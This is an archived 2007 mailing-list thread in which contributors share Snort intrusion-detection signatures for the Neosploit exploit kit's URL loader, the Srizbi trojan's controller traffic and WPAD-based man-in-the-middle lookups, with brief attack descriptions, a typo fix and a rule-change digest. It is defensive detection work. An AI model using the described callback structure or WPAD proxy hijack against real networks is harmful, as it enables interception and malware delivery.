From: urule99 at gmail.com (Blake Hartstein)
Date: Thu Dec 13 05:48:31 2007
Subject: [Bleeding-sigs] New Rules: Neosploit, Srizbi
Message-ID: <4760C61C.8040006@gmail.com>

Detects Neosploit URL Loader. Once exploit succeeds the embedded
shellcode will retrieve that long URL. Here's the structure
("%s?u%hu_%hu_%u_%hu_%lu_%lu_%lu_%s"): $script, OS, Browser, Browser's
version, Exploit #, unknown, Custom hash of REMOTE_ADDR, Custom hash of
HTTP_REFERER, $username (optional).

#Thanks to dxp
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
WEB Neosploit 1.5.x URL Loader"; flow:to_server,established;
content:"GET "; depth:4; nocase;
pcre:"/\?u\d_\d_\d{3,4}_\d_\d_\d{10}_\d{10}_\d{9,10}[_\da-z]{0,9}$/Ui";
classtype:web-application-attack; sid:2007705; rev:1; )

Read SecureWorks writeup of Srizbi here:
www.secureworks.com/research/threats/ronpaul. Also see sid:2007662 for
our previous rule that detects the post parameters related to this
threat. Very interesting code, it patches the network stack so that it
evades sniffers and firewalls on the local machine.

#by Joe Stewart from SecureWorks
alert udp $HOME_NET 1024: -> $EXTERNAL_NET 4099 (msg:"BLEEDING-EDGE
TROJAN Srizbi registering with controller"; dsize:20;  content:"|2d|";
offset:6; content:"|2d|"; distance:6;  within:1;
classtype:trojan-activity;
reference:url:www.secureworks.com/research/threats/ronpaul; sid:2007706;
rev:1; )


-Blake
From urule99 at gmail.com  Thu Dec 13 05:50:30 2007
From: urule99 at gmail.com (Blake Hartstein)
Date: Thu Dec 13 05:57:21 2007
Subject: [Bleeding-sigs] New Rules: WPAD / Web Proxy Autodiscovery Protocol 
Message-ID: <4760C826.4080605@gmail.com>

This is an interesting contribution. The wpad vulnerability only affects
second level domains, such as .com.au, .com.sg .co.in .co.uk. Many US
Clients are not affected, but there are workaround available for those
that are vulnerable.
Adam also sent us this description:

As the microsoft advisory notes (this isn't patched yet), Internet
Explorer (and other applications that use Internet Explorer settings,
such as Winamp and system updating utilities) use WPAD (Web Proxy
AutoDiscovery Protocol) to search out automatically to find a suitable
proxy server to use.

The risk is that client systems will automatically search out (if you
dont have a DNS entry on your local domain for wpad.company.com.au)
wpad.co.in and get its proxy server definition from that remote server,
which is not not controlled by your organization.

Therefore, an owner of wpad.com.au etc, can define a proxy to use, which
can therefore mean a MITM scenario is built.
More information:
http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
http://www.microsoft.com/technet/security/advisory/945713.mspx

#by Adam Pointon at sentinelsecurity.com.au
alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
Possible MITM lookup for WPAD.com"; content:"|04|wpad|03|com|02|";
nocase; reference:url,support.microsoft.com/kb/247333;
classtype:attempted-user; sid:2007707; rev:1;)
alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
Possible MITM lookup for WPAD.co"; content:"|04|wpad|02|co|02|"; nocase;
reference:url,support.microsoft.com/kb/247333; classtype:attempted-user;
sid:2007708; rev:1;)
alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
Possible MITM lookup for WPAD.net"; content:"|04|wpad|03|net|02|";
nocase; reference:url,support.microsoft.com/kb/247333;
classtype:attempted-user; sid:2007709; rev:1;)
alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
Possible MITM lookup for WPAD.org"; content:"|04|wpad|03|org|02|";
nocase; reference:url,support.microsoft.com/kb/247333;
classtype:attempted-user; sid:2007710; rev:1;)

Enjoy, comments welcome.
-Blake
From cunningpike at gmail.com  Thu Dec 13 05:55:23 2007
From: cunningpike at gmail.com (CunningPike)
Date: Thu Dec 13 06:02:09 2007
Subject: [Bleeding-sigs] New Rules: WPAD / Web Proxy Autodiscovery Protocol
In-Reply-To: <4760C826.4080605@gmail.com>
References: <4760C826.4080605@gmail.com>
Message-ID: <4760C94B.1050800@gmail.com>

Awesome - many Canadian domains are second level, e.g. bc.ca, on.ca and
so on.

CP

Blake Hartstein wrote:
> This is an interesting contribution. The wpad vulnerability only affects
> second level domains, such as .com.au, .com.sg .co.in .co.uk. Many US
> Clients are not affected, but there are workaround available for those
> that are vulnerable.
> Adam also sent us this description:
> 
> As the microsoft advisory notes (this isn't patched yet), Internet
> Explorer (and other applications that use Internet Explorer settings,
> such as Winamp and system updating utilities) use WPAD (Web Proxy
> AutoDiscovery Protocol) to search out automatically to find a suitable
> proxy server to use.
> 
> The risk is that client systems will automatically search out (if you
> dont have a DNS entry on your local domain for wpad.company.com.au)
> wpad.co.in and get its proxy server definition from that remote server,
> which is not not controlled by your organization.
> 
> Therefore, an owner of wpad.com.au etc, can define a proxy to use, which
> can therefore mean a MITM scenario is built.
> More information:
> http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
> http://www.microsoft.com/technet/security/advisory/945713.mspx
> 
> #by Adam Pointon at sentinelsecurity.com.au
> alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
> Possible MITM lookup for WPAD.com"; content:"|04|wpad|03|com|02|";
> nocase; reference:url,support.microsoft.com/kb/247333;
> classtype:attempted-user; sid:2007707; rev:1;)
> alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
> Possible MITM lookup for WPAD.co"; content:"|04|wpad|02|co|02|"; nocase;
> reference:url,support.microsoft.com/kb/247333; classtype:attempted-user;
> sid:2007708; rev:1;)
> alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
> Possible MITM lookup for WPAD.net"; content:"|04|wpad|03|net|02|";
> nocase; reference:url,support.microsoft.com/kb/247333;
> classtype:attempted-user; sid:2007709; rev:1;)
> alert udp $HOME_NET any -> $DNS_SERVERS 53 (msg:"BLEEDING-EDGE DNS
> Possible MITM lookup for WPAD.org"; content:"|04|wpad|03|org|02|";
> nocase; reference:url,support.microsoft.com/kb/247333;
> classtype:attempted-user; sid:2007710; rev:1;)
> 
> Enjoy, comments welcome.
> -Blake
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs
From dsmith at ecs.csus.edu  Thu Dec 13 16:43:25 2007
From: dsmith at ecs.csus.edu (Dick Smith)
Date: Thu Dec 13 16:50:09 2007
Subject: [Bleeding-sigs] Problem with bleeding-virus rules
Message-ID: <Pine.LNX.4.63.0712130838020.2827@gaia.ecs.csus.edu>


Hello,
         My snort ver 2.6 puked last night on the file

bleeding-virus.rules

I couldn't spot the syntax problem, can anyone else give me
a clue?

-- 

Dick Smith INTERNET: dsmith@csus.edu USnail: Computer Science Dept.
  __  ___  http://gaia.ecs.csus.edu/~dsmith : California State Univ.
|  \(___  Voice:    (916)  278 - 7328      : 6000  J Street
|__/____) FAX:      (916)  278 - 6774      : Sacramento, CA 95819-6021
From pepperjack at afferentsecurity.com  Thu Dec 13 16:48:59 2007
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Thu Dec 13 16:55:46 2007
Subject: [Bleeding-sigs] Re: typo on Srizbi
In-Reply-To: <4760C61C.8040006@gmail.com>
References: <4760C61C.8040006@gmail.com>
Message-ID: <20071213104859.c7fjemfhck8wsw4c@mail.afferentsecurity.com>

Quoting Blake Hartstein <urule99@gmail.com>:

>
> #by Joe Stewart from SecureWorks
> alert udp $HOME_NET 1024: -> $EXTERNAL_NET 4099 (msg:"BLEEDING-EDGE
> TROJAN Srizbi registering with controller"; dsize:20;  content:"|2d|";
> offset:6; content:"|2d|"; distance:6;  within:1;
> classtype:trojan-activity;
> reference:url:www.secureworks.com/research/threats/ronpaul; sid:2007706;
> rev:1; )

"url:"  should be "url,"  .

jp
Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com

From urule99 at gmail.com  Thu Dec 13 16:52:12 2007
From: urule99 at gmail.com (Blake Hartstein)
Date: Thu Dec 13 16:58:30 2007
Subject: [Bleeding-sigs] Re: typo on Srizbi
In-Reply-To: <20071213104859.c7fjemfhck8wsw4c@mail.afferentsecurity.com>
References: <4760C61C.8040006@gmail.com>
	<20071213104859.c7fjemfhck8wsw4c@mail.afferentsecurity.com>
Message-ID: <4761633C.1050400@gmail.com>

Fixed. sorry about that, you might consider upgrading to a newer snort 
version.
I'll test with 2.6 in the future as well.

Blake


Jack Pepper wrote:
> Quoting Blake Hartstein <urule99@gmail.com>:
>
>>
>> #by Joe Stewart from SecureWorks
>> alert udp $HOME_NET 1024: -> $EXTERNAL_NET 4099 (msg:"BLEEDING-EDGE
>> TROJAN Srizbi registering with controller"; dsize:20;  content:"|2d|";
>> offset:6; content:"|2d|"; distance:6;  within:1;
>> classtype:trojan-activity;
>> reference:url:www.secureworks.com/research/threats/ronpaul; sid:2007706;
>> rev:1; )
>
> "url:"  should be "url,"  .
>
> jp
> Framework?  I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs:  Isolate/Insulate/Innovate 
> http://www.afferentsecurity.com
>
> _______________________________________________
> Bleeding-sigs mailing list
> Bleeding-sigs@bleedingthreats.net
> http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs

From bleeding at bleedingthreats.net  Thu Dec 13 20:00:13 2007
From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net)
Date: Thu Dec 13 20:00:22 2007
Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes
Message-ID: <20071213200015.857DA230028@sb03.us.bleedingsnort.com>


[***] Results from Oinkmaster started Thu Dec 13 20:00:12 2007 [***]

[+++]          Added rules:          [+++]

 2007705 - BLEEDING-EDGE WEB Neosploit 1.5.x URL Loader (bleeding-web.rules)
 2007706 - BLEEDING-EDGE TROJAN Srizbi registering with controller (bleeding-virus.rules)
 2007707 - BLEEDING-EDGE DNS Possible MITM lookup for WPAD.com (bleeding.rules)
 2007708 - BLEEDING-EDGE DNS Possible MITM lookup for WPAD.co (bleeding.rules)
 2007709 - BLEEDING-EDGE DNS Possible MITM lookup for WPAD.net (bleeding.rules)
 2007710 - BLEEDING-EDGE DNS Possible MITM lookup for WPAD.org (bleeding.rules)


[///]     Modified active rules:     [///]

 2002383 - BLEEDING-EDGE SCAN Potential FTP Brute-Force attempt (bleeding-scan.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to bleeding-sid-msg.map (6):
        2007705 || BLEEDING-EDGE WEB Neosploit 1.5.x URL Loader
        2007706 || BLEEDING-EDGE TROJAN Srizbi registering with controller || url,www.secureworks.com/research/threats/ronpaul
        2007707 || BLEEDING-EDGE DNS Possible MITM lookup for WPAD.com || url,support.microsoft.com/kb/247333
        2007708 || BLEEDING-EDGE DNS Possible MITM lookup for WPAD.co || url,support.microsoft.com/kb/247333
        2007709 || BLEEDING-EDGE DNS Possible MITM lookup for WPAD.net || url,support.microsoft.com/kb/247333
        2007710 || BLEEDING-EDGE DNS Possible MITM lookup for WPAD.org || url,support.microsoft.com/kb/247333

     -> Added to bleeding-virus.rules (1):
        #by Joe Stewart from SecureWorks

     -> Added to bleeding-web.rules (1):
        #Thanks to dxp

     -> Added to bleeding.rules (1):
        #by Adam Pointon at sentinelsecurity.com.au

[---]     Removed non-rule lines:    [---]

     -> Removed from bleeding-sid-msg.map (214):
        2500148 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (149) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500149 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (150) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500150 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (151) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500151 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (152) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500152 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (153) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500153 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (154) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500154 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (155) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500155 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (156) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts
        2500156 || BLEEDING-EDGE COMPROMISED Known Compromised or Hostile Host Traffic (157) || url,doc.bleedingthreats.net/bin/view/Main/CompromisedHosts